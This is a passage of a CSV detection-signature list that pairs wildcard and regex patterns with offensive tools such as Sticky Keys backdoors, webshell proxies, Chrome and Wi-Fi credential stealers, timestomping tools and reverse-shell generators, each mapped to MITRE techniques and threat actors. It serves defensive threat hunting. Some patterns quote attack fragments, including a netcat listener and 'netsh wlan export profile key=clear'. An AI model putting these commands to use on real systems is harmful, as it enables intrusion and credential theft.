removed*",".{0,1000}Sticky\sKey\sbackdoor\shas\sbeen\sremoved.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","60405" "*Sticky Keys backdoor added.*",".{0,1000}Sticky\sKeys\sbackdoor\sadded\..{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","60406" "*Sticky Keys backdoor does not exist, let's add it*",".{0,1000}Sticky\sKeys\sbackdoor\sdoes\snot\sexist,\slet\'s\sadd\sit.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","60407" "*Sticky-Keys-Slayer*",".{0,1000}Sticky\-Keys\-Slayer.{0,1000}","offensive_tool_keyword","Sticky-Keys-Slayer","Scans for accessibility tools backdoors via RDP","T1078 - T1015 - T1203","TA0003 - TA0007 - TA0008","N/A","N/A","Reconnaissance","https://github.com/linuz/Sticky-Keys-Slayer","1","1","N/A","N/A","N/A","4","340","71","2018-03-16T15:59:41Z","2016-08-06T18:55:28Z","60408" "*StickyNotesExtract.exe*",".{0,1000}StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","60409" "*Stifle.exe add /object:*",".{0,1000}Stifle\.exe\sadd\s\/object\:.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","N/A","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","60410" "*Stifle.exe clear *",".{0,1000}Stifle\.exe\sclear\s.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","N/A","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","60411" "*stinger_client -*",".{0,1000}stinger_client\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","0","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","60412" "*stinger_client.py*",".{0,1000}stinger_client\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","60413" "*stinger_server.exe*",".{0,1000}stinger_server\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","60414" "*stolen_passwords.txt*",".{0,1000}stolen_passwords\.txt.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","60415" 
"*StompySharps.csproj*",".{0,1000}StompySharps\.csproj.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","60416" "*StompySharps.exe*",".{0,1000}StompySharps\.exe.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","60417" "*StompySharps.sln*",".{0,1000}StompySharps\.sln.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","60418" "*stopdaisy*",".{0,1000}stopdaisy.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60421" "*StopInveigh*",".{0,1000}StopInveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60422" "*-stop-keylogger*",".{0,1000}\-stop\-keylogger.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - 
TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","60423" "*stop-keystrokes*",".{0,1000}stop\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60424" "*stormshadow07*",".{0,1000}stormshadow07.{0,1000}","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","1","N/A","N/A","N/A","10","977","169","2024-01-19T12:11:39Z","2018-02-17T11:46:40Z","60548" "*Stowaway/admin/process*",".{0,1000}Stowaway\/admin\/process.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","60549" "*STRING firefox about:logins*",".{0,1000}STRING\sfirefox\sabout\:logins.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. 
It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","60551" "*String k = ""e45e329feb5d925b""*",".{0,1000}String\sk\s\=\s\""e45e329feb5d925b\"".{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#content","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","60552" "*string maliciousCommand =*",".{0,1000}string\smaliciousCommand\s\=.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","60553" "*String netsh wlan export profile key=clear*",".{0,1000}String\snetsh\swlan\sexport\sprofile\skey\=clear.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","60554" "*strip_bof.ps1*",".{0,1000}strip_bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","60556" "*strip2john.py*",".{0,1000}strip2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60557" "*strip-bof -Path *",".{0,1000}strip\-bof\s\-Path\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used 
to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","60558" "*StrongLoader_x64.exe*",".{0,1000}StrongLoader_x64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - 
T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60559" "*struct sockaddr_in revsockaddr*",".{0,1000}struct\ssockaddr_in\srevsockaddr.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60560" "*struts_ext_v2.jar*",".{0,1000}struts_ext_v2\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","60561" "*stty raw -echo; (stty size; cat) | nc -lvnp*",".{0,1000}stty\sraw\s\-echo\;\s\(stty\ssize\;\scat\)\s\|\snc\s\-lvnp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60562" "*sty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd.onion*",".{0,1000}sty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","60564" "*su rootz*",".{0,1000}su\srootz.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z","60567" "*su_brute_user_num*",".{0,1000}su_brute_user_num.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","60568" "*subbrute.exe*",".{0,1000}subbrute.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","60569" "*subbrute.py -*",".{0,1000}subbrute\.py\s\-.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","60570" 
"*subbrute_windows.zip*",".{0,1000}subbrute_windows\.zip.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","60571" "*subdomain_takeovers.py*",".{0,1000}subdomain_takeovers\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","60572" "*subdomain-enumeration.py*",".{0,1000}subdomain\-enumeration\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","60573" "*subdomains-100.txt*",".{0,1000}subdomains\-100\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60574" "*subdomains-1000.txt*",".{0,1000}subdomains\-1000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60575" 
"*subdomains-10000.txt*",".{0,1000}subdomains\-10000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60576" "*subdomains-500.txt*",".{0,1000}subdomains\-500\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60577" "*subdomains-top1million-110000.txt*",".{0,1000}subdomains\-top1million\-110000\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","60578" 